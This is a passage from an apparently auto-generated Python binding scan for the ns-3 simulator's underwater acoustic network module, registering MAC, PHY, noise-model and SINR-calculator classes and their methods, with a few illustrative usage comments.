[param('ns3::Ptr< ns3::Packet >', 'pkt'), param('ns3::Address const &', 'dest'), param('uint16_t', 'protocolNumber')],
is_virtual=True)
## uan-mac-cw.h (module 'uan'): ns3::Address ns3::UanMacCw::GetAddress() [member function]
cls.add_method('GetAddress',
'ns3::Address',
[],
is_virtual=True)
## uan-mac-cw.h (module 'uan'): ns3::Address ns3::UanMacCw::GetBroadcast() const [member function]
cls.add_method('GetBroadcast',
'ns3::Address',
[],
is_const=True, is_virtual=True)
## uan-mac-cw.h (module 'uan'): uint32_t ns3::UanMacCw::GetCw() [member function]
cls.add_method('GetCw',
'uint32_t',
[],
is_virtual=True)
## uan-mac-cw.h (module 'uan'): ns3::Time ns3::UanMacCw::GetSlotTime() [member function]
cls.add_method('GetSlotTime',
'ns3::Time',
[],
is_virtual=True)
## uan-mac-cw.h (module 'uan'): static ns3::TypeId ns3::UanMacCw::GetTypeId() [member function]
cls.add_method('GetTypeId',
'ns3::TypeId',
[],
is_static=True)
## uan-mac-cw.h (module 'uan'): void ns3::UanMacCw::NotifyCcaEnd() [member function]
cls.add_method('NotifyCcaEnd',
'void',
[],
is_virtual=True)
## uan-mac-cw.h (module 'uan'): void ns3::UanMacCw::NotifyCcaStart() [member function]
cls.add_method('NotifyCcaStart',
'void',
[],
is_virtual=True)
## uan-mac-cw.h (module 'uan'): void ns3::UanMacCw::NotifyRxEndError() [member function]
cls.add_method('NotifyRxEndError',
'void',
[],
is_virtual=True)
## uan-mac-cw.h (module 'uan'): void ns3::UanMacCw::NotifyRxEndOk() [member function]
cls.add_method('NotifyRxEndOk',
'void',
[],
is_virtual=True)
## uan-mac-cw.h (module 'uan'): void ns3::UanMacCw::NotifyRxStart() [member function]
cls.add_method('NotifyRxStart',
'void',
[],
is_virtual=True)
## uan-mac-cw.h (module 'uan'): void ns3::UanMacCw::NotifyTxStart(ns3::Time duration) [member function]
cls.add_method('NotifyTxStart',
'void',
[param('ns3::Time', 'duration')],
is_virtual=True)
## uan-mac-cw.h (module 'uan'): void ns3::UanMacCw::SetAddress(ns3::UanAddress addr) [member function]
cls.add_method('SetAddress',
'void',
[param('ns3::UanAddress', 'addr')],
is_virtual=True)
## uan-mac-cw.h (module 'uan'): void ns3::UanMacCw::SetCw(uint32_t cw) [member function]
cls.add_method('SetCw',
'void',
[param('uint32_t', 'cw')],
is_virtual=True)
## uan-mac-cw.h (module 'uan'): void ns3::UanMacCw::SetForwardUpCb(ns3::Callback<void, ns3::Ptr<ns3::Packet>, ns3::UanAddress const&, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty> cb) [member function]
cls.add_method('SetForwardUpCb',
'void',
[param('ns3::Callback< void, ns3::Ptr< ns3::Packet >, ns3::UanAddress const &, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty >', 'cb')],
is_virtual=True)
## uan-mac-cw.h (module 'uan'): void ns3::UanMacCw::SetSlotTime(ns3::Time duration) [member function]
cls.add_method('SetSlotTime',
'void',
[param('ns3::Time', 'duration')],
is_virtual=True)
## uan-mac-cw.h (module 'uan'): void ns3::UanMacCw::DoDispose() [member function]
cls.add_method('DoDispose',
'void',
[],
visibility='protected', is_virtual=True)
return
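# Illustrative note (not part of the generated scan): UanMacCw extends the basic MAC
# interface with contention-window controls (SetCw/GetCw, SetSlotTime/GetSlotTime)
# registered above. Hedged sketch, assuming ns.uan and ns.core are importable:
#
#   import ns.uan, ns.core
#   mac = ns.uan.UanMacCw()
#   mac.SetCw(10)                          # window size is hypothetical
#   mac.SetSlotTime(ns.core.Seconds(0.2))  # slot duration is hypothetical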
def register_Ns3UanMacRc_methods(root_module, cls):
## uan-mac-rc.h (module 'uan'): ns3::UanMacRc::UanMacRc(ns3::UanMacRc const & arg0) [copy constructor]
cls.add_constructor([param('ns3::UanMacRc const &', 'arg0')])
## uan-mac-rc.h (module 'uan'): ns3::UanMacRc::UanMacRc() [constructor]
cls.add_constructor([])
## uan-mac-rc.h (module 'uan'): int64_t ns3::UanMacRc::AssignStreams(int64_t stream) [member function]
cls.add_method('AssignStreams',
'int64_t',
[param('int64_t', 'stream')],
is_virtual=True)
## uan-mac-rc.h (module 'uan'): void ns3::UanMacRc::AttachPhy(ns3::Ptr<ns3::UanPhy> phy) [member function]
cls.add_method('AttachPhy',
'void',
[param('ns3::Ptr< ns3::UanPhy >', 'phy')],
is_virtual=True)
## uan-mac-rc.h (module 'uan'): void ns3::UanMacRc::Clear() [member function]
cls.add_method('Clear',
'void',
[],
is_virtual=True)
## uan-mac-rc.h (module 'uan'): bool ns3::UanMacRc::Enqueue(ns3::Ptr<ns3::Packet> pkt, ns3::Address const & dest, uint16_t protocolNumber) [member function]
cls.add_method('Enqueue',
'bool',
[param('ns3::Ptr< ns3::Packet >', 'pkt'), param('ns3::Address const &', 'dest'), param('uint16_t', 'protocolNumber')],
is_virtual=True)
## uan-mac-rc.h (module 'uan'): ns3::Address ns3::UanMacRc::GetAddress() [member function]
cls.add_method('GetAddress',
'ns3::Address',
[],
is_virtual=True)
## uan-mac-rc.h (module 'uan'): ns3::Address ns3::UanMacRc::GetBroadcast() const [member function]
cls.add_method('GetBroadcast',
'ns3::Address',
[],
is_const=True, is_virtual=True)
## uan-mac-rc.h (module 'uan'): static ns3::TypeId ns3::UanMacRc::GetTypeId() [member function]
cls.add_method('GetTypeId',
'ns3::TypeId',
[],
is_static=True)
## uan-mac-rc.h (module 'uan'): void ns3::UanMacRc::SetAddress(ns3::UanAddress addr) [member function]
cls.add_method('SetAddress',
'void',
[param('ns3::UanAddress', 'addr')],
is_virtual=True)
## uan-mac-rc.h (module 'uan'): void ns3::UanMacRc::SetForwardUpCb(ns3::Callback<void, ns3::Ptr<ns3::Packet>, ns3::UanAddress const&, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty> cb) [member function]
cls.add_method('SetForwardUpCb',
'void',
[param('ns3::Callback< void, ns3::Ptr< ns3::Packet >, ns3::UanAddress const &, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty >', 'cb')],
is_virtual=True)
## uan-mac-rc.h (module 'uan'): void ns3::UanMacRc::DoDispose() [member function]
cls.add_method('DoDispose',
'void',
[],
visibility='protected', is_virtual=True)
return
def register_Ns3UanMacRcGw_methods(root_module, cls):
## uan-mac-rc-gw.h (module 'uan'): ns3::UanMacRcGw::UanMacRcGw(ns3::UanMacRcGw const & arg0) [copy constructor]
cls.add_constructor([param('ns3::UanMacRcGw const &', 'arg0')])
## uan-mac-rc-gw.h (module 'uan'): ns3::UanMacRcGw::UanMacRcGw() [constructor]
cls.add_constructor([])
## uan-mac-rc-gw.h (module 'uan'): int64_t ns3::UanMacRcGw::AssignStreams(int64_t stream) [member function]
cls.add_method('AssignStreams',
'int64_t',
[param('int64_t', 'stream')],
is_virtual=True)
## uan-mac-rc-gw.h (module 'uan'): void ns3::UanMacRcGw::AttachPhy(ns3::Ptr<ns3::UanPhy> phy) [member function]
cls.add_method('AttachPhy',
'void',
[param('ns3::Ptr< ns3::UanPhy >', 'phy')],
is_virtual=True)
## uan-mac-rc-gw.h (module 'uan'): void ns3::UanMacRcGw::Clear() [member function]
cls.add_method('Clear',
'void',
[],
is_virtual=True)
## uan-mac-rc-gw.h (module 'uan'): bool ns3::UanMacRcGw::Enqueue(ns3::Ptr<ns3::Packet> pkt, ns3::Address const & dest, uint16_t protocolNumber) [member function]
cls.add_method('Enqueue',
'bool',
[param('ns3::Ptr< ns3::Packet >', 'pkt'), param('ns3::Address const &', 'dest'), param('uint16_t', 'protocolNumber')],
is_virtual=True)
## uan-mac-rc-gw.h (module 'uan'): ns3::Address ns3::UanMacRcGw::GetAddress() [member function]
cls.add_method('GetAddress',
'ns3::Address',
[],
is_virtual=True)
## uan-mac-rc-gw.h (module 'uan'): ns3::Address ns3::UanMacRcGw::GetBroadcast() const [member function]
cls.add_method('GetBroadcast',
'ns3::Address',
[],
is_const=True, is_virtual=True)
## uan-mac-rc-gw.h (module 'uan'): static ns3::TypeId ns3::UanMacRcGw::GetTypeId() [member function]
cls.add_method('GetTypeId',
'ns3::TypeId',
[],
is_static=True)
## uan-mac-rc-gw.h (module 'uan'): void ns3::UanMacRcGw::SetAddress(ns3::UanAddress addr) [member function]
cls.add_method('SetAddress',
'void',
[param('ns3::UanAddress', 'addr')],
is_virtual=True)
## uan-mac-rc-gw.h (module 'uan'): void ns3::UanMacRcGw::SetForwardUpCb(ns3::Callback<void, ns3::Ptr<ns3::Packet>, ns3::UanAddress const&, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty> cb) [member function]
cls.add_method('SetForwardUpCb',
'void',
[param('ns3::Callback< void, ns3::Ptr< ns3::Packet >, ns3::UanAddress const &, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty >', 'cb')],
is_virtual=True)
## uan-mac-rc-gw.h (module 'uan'): void ns3::UanMacRcGw::DoDispose() [member function]
cls.add_method('DoDispose',
'void',
[],
visibility='protected', is_virtual=True)
return
def register_Ns3UanNoiseModel_methods(root_module, cls):
## uan-noise-model.h (module 'uan'): ns3::UanNoiseModel::UanNoiseModel() [constructor]
cls.add_constructor([])
## uan-noise-model.h (module 'uan'): ns3::UanNoiseModel::UanNoiseModel(ns3::UanNoiseModel const & arg0) [copy constructor]
cls.add_constructor([param('ns3::UanNoiseModel const &', 'arg0')])
## uan-noise-model.h (module 'uan'): void ns3::UanNoiseModel::Clear() [member function]
cls.add_method('Clear',
'void',
[],
is_virtual=True)
## uan-noise-model.h (module 'uan'): void ns3::UanNoiseModel::DoDispose() [member function]
cls.add_method('DoDispose',
'void',
[],
is_virtual=True)
## uan-noise-model.h (module 'uan'): double ns3::UanNoiseModel::GetNoiseDbHz(double fKhz) const [member function]
cls.add_method('GetNoiseDbHz',
'double',
[param('double', 'fKhz')],
is_pure_virtual=True, is_const=True, is_virtual=True)
## uan-noise-model.h (module 'uan'): static ns3::TypeId ns3::UanNoiseModel::GetTypeId() [member function]
cls.add_method('GetTypeId',
'ns3::TypeId',
[],
is_static=True)
return
def register_Ns3UanNoiseModelDefault_methods(root_module, cls):
## uan-noise-model-default.h (module 'uan'): ns3::UanNoiseModelDefault::UanNoiseModelDefault(ns3::UanNoiseModelDefault const & arg0) [copy constructor]
cls.add_constructor([param('ns3::UanNoiseModelDefault const &', 'arg0')])
## uan-noise-model-default.h (module 'uan'): ns3::UanNoiseModelDefault::UanNoiseModelDefault() [constructor]
cls.add_constructor([])
## uan-noise-model-default.h (module 'uan'): double ns3::UanNoiseModelDefault::GetNoiseDbHz(double fKhz) const [member function]
cls.add_method('GetNoiseDbHz',
'double',
[param('double', 'fKhz')],
is_const=True, is_virtual=True)
## uan-noise-model-default.h (module 'uan'): static ns3::TypeId ns3::UanNoiseModelDefault::GetTypeId() [member function]
cls.add_method('GetTypeId',
'ns3::TypeId',
[],
is_static=True)
return
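# Illustrative note (not part of the generated scan): UanNoiseModelDefault supplies a
# concrete GetNoiseDbHz(fKhz) overriding the pure-virtual method in UanNoiseModel above.
# Hedged sketch, assuming ns.uan is importable:
#
#   import ns.uan
#   noise = ns.uan.UanNoiseModelDefault()
#   n = noise.GetNoiseDbHz(12.0)  # frequency in kHz; the value is hypothetical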
def register_Ns3UanPhy_methods(root_module, cls):
## uan-phy.h (module 'uan'): ns3::UanPhy::UanPhy() [constructor]
cls.add_constructor([])
## uan-phy.h (module 'uan'): ns3::UanPhy::UanPhy(ns3::UanPhy const & arg0) [copy constructor]
cls.add_constructor([param('ns3::UanPhy const &', 'arg0')])
## uan-phy.h (module 'uan'): int64_t ns3::UanPhy::AssignStreams(int64_t stream) [member function]
cls.add_method('AssignStreams',
'int64_t',
[param('int64_t', 'stream')],
is_pure_virtual=True, is_virtual=True)
## uan-phy.h (module 'uan'): void ns3::UanPhy::Clear() [member function]
cls.add_method('Clear',
'void',
[],
is_pure_virtual=True, is_virtual=True)
## uan-phy.h (module 'uan'): void ns3::UanPhy::EnergyDepletionHandler() [member function]
cls.add_method('EnergyDepletionHandler',
'void',
[],
is_pure_virtual=True, is_virtual=True)
## uan-phy.h (module 'uan'): double ns3::UanPhy::GetCcaThresholdDb() [member function]
cls.add_method('GetCcaThresholdDb',
'double',
[],
is_pure_virtual=True, is_virtual=True)
## uan-phy.h (module 'uan'): ns3::Ptr<ns3::UanChannel> ns3::UanPhy::GetChannel() const [member function]
cls.add_method('GetChannel',
'ns3::Ptr< ns3::UanChannel >',
[],
is_pure_virtual=True, is_const=True, is_virtual=True)
## uan-phy.h (module 'uan'): ns3::Ptr<ns3::UanNetDevice> ns3::UanPhy::GetDevice() [member function]
cls.add_method('GetDevice',
'ns3::Ptr< ns3::UanNetDevice >',
[],
is_pure_virtual=True, is_virtual=True)
## uan-phy.h (module 'uan'): ns3::UanTxMode ns3::UanPhy::GetMode(uint32_t n) [member function]
cls.add_method('GetMode',
'ns3::UanTxMode',
[param('uint32_t', 'n')],
is_pure_virtual=True, is_virtual=True)
## uan-phy.h (module 'uan'): uint32_t ns3::UanPhy::GetNModes() [member function]
cls.add_method('GetNModes',
'uint32_t',
[],
is_pure_virtual=True, is_virtual=True)
## uan-phy.h (module 'uan'): ns3::Ptr<ns3::Packet> ns3::UanPhy::GetPacketRx() const [member function]
cls.add_method('GetPacketRx',
'ns3::Ptr< ns3::Packet >',
[],
is_pure_virtual=True, is_const=True, is_virtual=True)
## uan-phy.h (module 'uan'): double ns3::UanPhy::GetRxGainDb() [member function]
cls.add_method('GetRxGainDb',
'double',
[],
is_pure_virtual=True, is_virtual=True)
## uan-phy.h (module 'uan'): double ns3::UanPhy::GetRxThresholdDb() [member function]
cls.add_method('GetRxThresholdDb',
'double',
[],
is_pure_virtual=True, is_virtual=True)
## uan-phy.h (module 'uan'): ns3::Ptr<ns3::UanTransducer> ns3::UanPhy::GetTransducer() [member function]
cls.add_method('GetTransducer',
'ns3::Ptr< ns3::UanTransducer >',
[],
is_pure_virtual=True, is_virtual=True)
## uan-phy.h (module 'uan'): double ns3::UanPhy::GetTxPowerDb() [member function]
cls.add_method('GetTxPowerDb',
'double',
[],
is_pure_virtual=True, is_virtual=True)
## uan-phy.h (module 'uan'): static ns3::TypeId ns3::UanPhy::GetTypeId() [member function]
cls.add_method('GetTypeId',
'ns3::TypeId',
[],
is_static=True)
## uan-phy.h (module 'uan'): bool ns3::UanPhy::IsStateBusy() [member function]
cls.add_method('IsStateBusy',
'bool',
[],
is_pure_virtual=True, is_virtual=True)
## uan-phy.h (module 'uan'): bool ns3::UanPhy::IsStateCcaBusy() [member function]
cls.add_method('IsStateCcaBusy',
'bool',
[],
is_pure_virtual=True, is_virtual=True)
## uan-phy.h (module 'uan'): bool ns3::UanPhy::IsStateIdle() [member function]
cls.add_method('IsStateIdle',
'bool',
[],
is_pure_virtual=True, is_virtual=True)
## uan-phy.h (module 'uan'): bool ns3::UanPhy::IsStateRx() [member function]
cls.add_method('IsStateRx',
'bool',
[],
is_pure_virtual=True, is_virtual=True)
## uan-phy.h (module 'uan'): bool ns3::UanPhy::IsStateSleep() [member function]
cls.add_method('IsStateSleep',
'bool',
[],
is_pure_virtual=True, is_virtual=True)
## uan-phy.h (module 'uan'): bool ns3::UanPhy::IsStateTx() [member function]
cls.add_method('IsStateTx',
'bool',
[],
is_pure_virtual=True, is_virtual=True)
## uan-phy.h (module 'uan'): void ns3::UanPhy::NotifyIntChange() [member function]
cls.add_method('NotifyIntChange',
'void',
[],
is_pure_virtual=True, is_virtual=True)
## uan-phy.h (module 'uan'): void ns3::UanPhy::NotifyRxBegin(ns3::Ptr<const ns3::Packet> packet) [member function]
cls.add_method('NotifyRxBegin',
'void',
[param('ns3::Ptr< ns3::Packet const >', 'packet')])
## uan-phy.h (module 'uan'): void ns3::UanPhy::NotifyRxDrop(ns3::Ptr<const ns3::Packet> packet) [member function]
cls.add_method('NotifyRxDrop',
'void',
[param('ns3::Ptr< ns3::Packet const >', 'packet')])
## uan-phy.h (module 'uan'): void ns3::UanPhy::NotifyRxEnd(ns3::Ptr<const ns3::Packet> packet) [member function]
cls.add_method('NotifyRxEnd',
'void',
[param('ns3::Ptr< ns3::Packet const >', 'packet')])
## uan-phy.h (module 'uan'): void ns3::UanPhy::NotifyTransStartTx(ns3::Ptr<ns3::Packet> packet, double txPowerDb, ns3::UanTxMode txMode) [member function]
cls.add_method('NotifyTransStartTx',
'void',
[param('ns3::Ptr< ns3::Packet >', 'packet'), param('double', 'txPowerDb'), param('ns3::UanTxMode', 'txMode')],
is_pure_virtual=True, is_virtual=True)
## uan-phy.h (module 'uan'): void ns3::UanPhy::NotifyTxBegin(ns3::Ptr<const ns3::Packet> packet) [member function]
cls.add_method('NotifyTxBegin',
'void',
[param('ns3::Ptr< ns3::Packet const >', 'packet')])
## uan-phy.h (module 'uan'): void ns3::UanPhy::NotifyTxDrop(ns3::Ptr<const ns3::Packet> packet) [member function]
cls.add_method('NotifyTxDrop',
'void',
[param('ns3::Ptr< ns3::Packet const >', 'packet')])
## uan-phy.h (module 'uan'): void ns3::UanPhy::NotifyTxEnd(ns3::Ptr<const ns3::Packet> packet) [member function]
cls.add_method('NotifyTxEnd',
'void',
[param('ns3::Ptr< ns3::Packet const >', 'packet')])
## uan-phy.h (module 'uan'): void ns3::UanPhy::RegisterListener(ns3::UanPhyListener * listener) [member function]
cls.add_method('RegisterListener',
'void',
[param('ns3::UanPhyListener *', 'listener')],
is_pure_virtual=True, is_virtual=True)
## uan-phy.h (module 'uan'): void ns3::UanPhy::SendPacket(ns3::Ptr<ns3::Packet> pkt, uint32_t modeNum) [member function]
cls.add_method('SendPacket',
'void',
[param('ns3::Ptr< ns3::Packet >', 'pkt'), param('uint32_t', 'modeNum')],
is_pure_virtual=True, is_virtual=True)
## uan-phy.h (module 'uan'): void ns3::UanPhy::SetCcaThresholdDb(double thresh) [member function]
cls.add_method('SetCcaThresholdDb',
'void',
[param('double', 'thresh')],
is_pure_virtual=True, is_virtual=True)
## uan-phy.h (module 'uan'): void ns3::UanPhy::SetChannel(ns3::Ptr<ns3::UanChannel> channel) [member function]
cls.add_method('SetChannel',
'void',
[param('ns3::Ptr< ns3::UanChannel >', 'channel')],
is_pure_virtual=True, is_virtual=True)
## uan-phy.h (module 'uan'): void ns3::UanPhy::SetDevice(ns3::Ptr<ns3::UanNetDevice> device) [member function]
cls.add_method('SetDevice',
'void',
[param('ns3::Ptr< ns3::UanNetDevice >', 'device')],
is_pure_virtual=True, is_virtual=True)
## uan-phy.h (module 'uan'): void ns3::UanPhy::SetEnergyModelCallback(ns3::Callback<void, int, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty> callback) [member function]
cls.add_method('SetEnergyModelCallback',
'void',
[param('ns3::Callback< void, int, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty >', 'callback')],
is_pure_virtual=True, is_virtual=True)
## uan-phy.h (module 'uan'): void ns3::UanPhy::SetMac(ns3::Ptr<ns3::UanMac> mac) [member function]
cls.add_method('SetMac',
'void',
[param('ns3::Ptr< ns3::UanMac >', 'mac')],
is_pure_virtual=True, is_virtual=True)
## uan-phy.h (module 'uan'): void ns3::UanPhy::SetReceiveErrorCallback(ns3::Callback<void, ns3::Ptr<ns3::Packet>, double, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty> cb) [member function]
cls.add_method('SetReceiveErrorCallback',
'void',
[param('ns3::Callback< void, ns3::Ptr< ns3::Packet >, double, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty >', 'cb')],
is_pure_virtual=True, is_virtual=True)
## uan-phy.h (module 'uan'): void ns3::UanPhy::SetReceiveOkCallback(ns3::Callback<void, ns3::Ptr<ns3::Packet>, double, ns3::UanTxMode, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty> cb) [member function]
cls.add_method('SetReceiveOkCallback',
'void',
[param('ns3::Callback< void, ns3::Ptr< ns3::Packet >, double, ns3::UanTxMode, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty >', 'cb')],
is_pure_virtual=True, is_virtual=True)
## uan-phy.h (module 'uan'): void ns3::UanPhy::SetRxGainDb(double gain) [member function]
cls.add_method('SetRxGainDb',
'void',
[param('double', 'gain')],
is_pure_virtual=True, is_virtual=True)
## uan-phy.h (module 'uan'): void ns3::UanPhy::SetRxThresholdDb(double thresh) [member function]
cls.add_method('SetRxThresholdDb',
'void',
[param('double', 'thresh')],
is_pure_virtual=True, is_virtual=True)
## uan-phy.h (module 'uan'): void ns3::UanPhy::SetSleepMode(bool sleep) [member function]
cls.add_method('SetSleepMode',
'void',
[param('bool', 'sleep')],
is_pure_virtual=True, is_virtual=True)
## uan-phy.h (module 'uan'): void ns3::UanPhy::SetTransducer(ns3::Ptr<ns3::UanTransducer> trans) [member function]
cls.add_method('SetTransducer',
'void',
[param('ns3::Ptr< ns3::UanTransducer >', 'trans')],
is_pure_virtual=True, is_virtual=True)
## uan-phy.h (module 'uan'): void ns3::UanPhy::SetTxPowerDb(double txpwr) [member function]
cls.add_method('SetTxPowerDb',
'void',
[param('double', 'txpwr')],
is_pure_virtual=True, is_virtual=True)
## uan-phy.h (module 'uan'): void ns3::UanPhy::StartRxPacket(ns3::Ptr<ns3::Packet> pkt, double rxPowerDb, ns3::UanTxMode txMode, ns3::UanPdp pdp) [member function]
cls.add_method('StartRxPacket',
'void',
[param('ns3::Ptr< ns3::Packet >', 'pkt'), param('double', 'rxPowerDb'), param('ns3::UanTxMode', 'txMode'), param('ns3::UanPdp', 'pdp')],
is_pure_virtual=True, is_virtual=True)
return
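# Illustrative note (not part of the generated scan): UanPhy is registered with several
# is_pure_virtual=True methods, so it is an abstract interface on the C++ side. Python
# code would normally instantiate one of the concrete subclasses registered below
# (UanPhyGen, UanPhyDual) rather than UanPhy itself. Hedged sketch, assuming ns.uan is
# importable:
#
#   import ns.uan
#   phy = ns.uan.UanPhyGen()
#   phy.SetTxPowerDb(190.0)     # power value is hypothetical
#   phy.SetRxThresholdDb(10.0)  # threshold value is hypothetical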
def register_Ns3UanPhyCalcSinr_methods(root_module, cls):
## uan-phy.h (module 'uan'): ns3::UanPhyCalcSinr::UanPhyCalcSinr() [constructor]
cls.add_constructor([])
## uan-phy.h (module 'uan'): ns3::UanPhyCalcSinr::UanPhyCalcSinr(ns3::UanPhyCalcSinr const & arg0) [copy constructor]
cls.add_constructor([param('ns3::UanPhyCalcSinr const &', 'arg0')])
## uan-phy.h (module 'uan'): double ns3::UanPhyCalcSinr::CalcSinrDb(ns3::Ptr<ns3::Packet> pkt, ns3::Time arrTime, double rxPowerDb, double ambNoiseDb, ns3::UanTxMode mode, ns3::UanPdp pdp, std::list<ns3::UanPacketArrival, std::allocator<ns3::UanPacketArrival> > const & arrivalList) const [member function]
cls.add_method('CalcSinrDb',
'double',
[param('ns3::Ptr< ns3::Packet >', 'pkt'), param('ns3::Time', 'arrTime'), param('double', 'rxPowerDb'), param('double', 'ambNoiseDb'), param('ns3::UanTxMode', 'mode'), param('ns3::UanPdp', 'pdp'), param('std::list< ns3::UanPacketArrival > const &', 'arrivalList')],
is_pure_virtual=True, is_const=True, is_virtual=True)
## uan-phy.h (module 'uan'): void ns3::UanPhyCalcSinr::Clear() [member function]
cls.add_method('Clear',
'void',
[],
is_virtual=True)
## uan-phy.h (module 'uan'): double ns3::UanPhyCalcSinr::DbToKp(double db) const [member function]
cls.add_method('DbToKp',
'double',
[param('double', 'db')],
is_const=True)
## uan-phy.h (module 'uan'): void ns3::UanPhyCalcSinr::DoDispose() [member function]
cls.add_method('DoDispose',
'void',
[],
is_virtual=True)
## uan-phy.h (module 'uan'): static ns3::TypeId ns3::UanPhyCalcSinr::GetTypeId() [member function]
cls.add_method('GetTypeId',
'ns3::TypeId',
[],
is_static=True)
## uan-phy.h (module 'uan'): double ns3::UanPhyCalcSinr::KpToDb(double kp) const [member function]
cls.add_method('KpToDb',
'double',
[param('double', 'kp')],
is_const=True)
return
def register_Ns3UanPhyCalcSinrDefault_methods(root_module, cls):
## uan-phy-gen.h (module 'uan'): ns3::UanPhyCalcSinrDefault::UanPhyCalcSinrDefault(ns3::UanPhyCalcSinrDefault const & arg0) [copy constructor]
cls.add_constructor([param('ns3::UanPhyCalcSinrDefault const &', 'arg0')])
## uan-phy-gen.h (module 'uan'): ns3::UanPhyCalcSinrDefault::UanPhyCalcSinrDefault() [constructor]
cls.add_constructor([])
## uan-phy-gen.h (module 'uan'): double ns3::UanPhyCalcSinrDefault::CalcSinrDb(ns3::Ptr<ns3::Packet> pkt, ns3::Time arrTime, double rxPowerDb, double ambNoiseDb, ns3::UanTxMode mode, ns3::UanPdp pdp, std::list<ns3::UanPacketArrival, std::allocator<ns3::UanPacketArrival> > const & arrivalList) const [member function]
cls.add_method('CalcSinrDb',
'double',
[param('ns3::Ptr< ns3::Packet >', 'pkt'), param('ns3::Time', 'arrTime'), param('double', 'rxPowerDb'), param('double', 'ambNoiseDb'), param('ns3::UanTxMode', 'mode'), param('ns3::UanPdp', 'pdp'), param('std::list< ns3::UanPacketArrival > const &', 'arrivalList')],
is_const=True, is_virtual=True)
## uan-phy-gen.h (module 'uan'): static ns3::TypeId ns3::UanPhyCalcSinrDefault::GetTypeId() [member function]
cls.add_method('GetTypeId',
'ns3::TypeId',
[],
is_static=True)
return
def register_Ns3UanPhyCalcSinrDual_methods(root_module, cls):
## uan-phy-dual.h (module 'uan'): ns3::UanPhyCalcSinrDual::UanPhyCalcSinrDual(ns3::UanPhyCalcSinrDual const & arg0) [copy constructor]
cls.add_constructor([param('ns3::UanPhyCalcSinrDual const &', 'arg0')])
## uan-phy-dual.h (module 'uan'): ns3::UanPhyCalcSinrDual::UanPhyCalcSinrDual() [constructor]
cls.add_constructor([])
## uan-phy-dual.h (module 'uan'): double ns3::UanPhyCalcSinrDual::CalcSinrDb(ns3::Ptr<ns3::Packet> pkt, ns3::Time arrTime, double rxPowerDb, double ambNoiseDb, ns3::UanTxMode mode, ns3::UanPdp pdp, std::list<ns3::UanPacketArrival, std::allocator<ns3::UanPacketArrival> > const & arrivalList) const [member function]
cls.add_method('CalcSinrDb',
'double',
[param('ns3::Ptr< ns3::Packet >', 'pkt'), param('ns3::Time', 'arrTime'), param('double', 'rxPowerDb'), param('double', 'ambNoiseDb'), param('ns3::UanTxMode', 'mode'), param('ns3::UanPdp', 'pdp'), param('std::list< ns3::UanPacketArrival > const &', 'arrivalList')],
is_const=True, is_virtual=True)
## uan-phy-dual.h (module 'uan'): static ns3::TypeId ns3::UanPhyCalcSinrDual::GetTypeId() [member function]
cls.add_method('GetTypeId',
'ns3::TypeId',
[],
is_static=True)
return
def register_Ns3UanPhyCalcSinrFhFsk_methods(root_module, cls):
## uan-phy-gen.h (module 'uan'): ns3::UanPhyCalcSinrFhFsk::UanPhyCalcSinrFhFsk(ns3::UanPhyCalcSinrFhFsk const & arg0) [copy constructor]
cls.add_constructor([param('ns3::UanPhyCalcSinrFhFsk const &', 'arg0')])
## uan-phy-gen.h (module 'uan'): ns3::UanPhyCalcSinrFhFsk::UanPhyCalcSinrFhFsk() [constructor]
cls.add_constructor([])
## uan-phy-gen.h (module 'uan'): double ns3::UanPhyCalcSinrFhFsk::CalcSinrDb(ns3::Ptr<ns3::Packet> pkt, ns3::Time arrTime, double rxPowerDb, double ambNoiseDb, ns3::UanTxMode mode, ns3::UanPdp pdp, std::list<ns3::UanPacketArrival, std::allocator<ns3::UanPacketArrival> > const & arrivalList) const [member function]
cls.add_method('CalcSinrDb',
'double',
[param('ns3::Ptr< ns3::Packet >', 'pkt'), param('ns3::Time', 'arrTime'), param('double', 'rxPowerDb'), param('double', 'ambNoiseDb'), param('ns3::UanTxMode', 'mode'), param('ns3::UanPdp', 'pdp'), param('std::list< ns3::UanPacketArrival > const &', 'arrivalList')],
is_const=True, is_virtual=True)
## uan-phy-gen.h (module 'uan'): static ns3::TypeId ns3::UanPhyCalcSinrFhFsk::GetTypeId() [member function]
cls.add_method('GetTypeId',
'ns3::TypeId',
[],
is_static=True)
return
def register_Ns3UanPhyDual_methods(root_module, cls):
## uan-phy-dual.h (module 'uan'): ns3::UanPhyDual::UanPhyDual(ns3::UanPhyDual const & arg0) [copy constructor]
cls.add_constructor([param('ns3::UanPhyDual const &', 'arg0')])
## uan-phy-dual.h (module 'uan'): ns3::UanPhyDual::UanPhyDual() [constructor]
cls.add_constructor([])
## uan-phy-dual.h (module 'uan'): int64_t ns3::UanPhyDual::AssignStreams(int64_t stream) [member function]
cls.add_method('AssignStreams',
'int64_t',
[param('int64_t', 'stream')],
is_virtual=True)
## uan-phy-dual.h (module 'uan'): void ns3::UanPhyDual::Clear() [member function]
cls.add_method('Clear',
'void',
[],
is_virtual=True)
## uan-phy-dual.h (module 'uan'): void ns3::UanPhyDual::EnergyDepletionHandler() [member function]
cls.add_method('EnergyDepletionHandler',
'void',
[],
is_virtual=True)
## uan-phy-dual.h (module 'uan'): double ns3::UanPhyDual::GetCcaThresholdDb() [member function]
cls.add_method('GetCcaThresholdDb',
'double',
[],
is_virtual=True)
## uan-phy-dual.h (module 'uan'): double ns3::UanPhyDual::GetCcaThresholdPhy1() const [member function]
cls.add_method('GetCcaThresholdPhy1',
'double',
[],
is_const=True)
## uan-phy-dual.h (module 'uan'): double ns3::UanPhyDual::GetCcaThresholdPhy2() const [member function]
cls.add_method('GetCcaThresholdPhy2',
'double',
[],
